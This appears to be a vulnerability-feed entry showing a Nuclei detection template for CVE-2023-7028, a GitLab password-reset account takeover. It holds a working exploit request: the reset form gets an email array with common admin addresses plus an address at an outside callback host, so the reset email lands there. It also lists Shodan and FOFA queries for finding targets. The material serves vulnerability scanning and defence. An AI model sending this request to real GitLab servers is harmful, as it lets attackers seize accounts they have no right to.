NUCLEI:CVE-2023-7028
History: Jan 14, 2024 - 7:28 a.m.

GitLab - Account Takeover via Password Reset

2024-01-14 07:28:32
ProjectDiscovery
github.com

Tags: hackerone, cve2023, gitlab, auth-bypass, intrusive, critical, account-takeover, email-delivery, vulnerability

CVSS3: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

AI Score: 8.5 High (Confidence: High)

EPSS: 0.96 High (Percentile: 99.5%)

An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.

id: CVE-2023-7028

info:
  name: GitLab - Account Takeover via Password Reset
  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
  reference:
    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
    - https://x.com/rwincey/status/1745659710089437368?s=20
    - https://gitlab.com/gitlab-org/gitlab/-/issues/436084
    - https://hackerone.com/reports/2293343
    - https://github.com/V1lu0/CVE-2023-7028
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7028
    cwe-id: CWE-640,CWE-284
    epss-score: 0.95952
    epss-percentile: 0.99464
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /users/password HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/users/password/new

        authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}

    payloads:
      username:
        - [email protected]
        - admin@{{RDN}}
        - root@{{RDN}}
        - gitlab@{{RDN}}
        - git@{{RDN}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'smtp')

    extractors:
      - type: dsl
        dsl:
          - username
# digest: 4a0a00473045022100fe706da29f53fa0b108713ef9f95c38b54a7481e7a91e1935b4a61b053972c320220348984153c3fabb194fc8d66770c796b3a32a7ebfd8f0a20d8eaf3b529aa2c84:922c64590222798bb761d5b6d8e72950
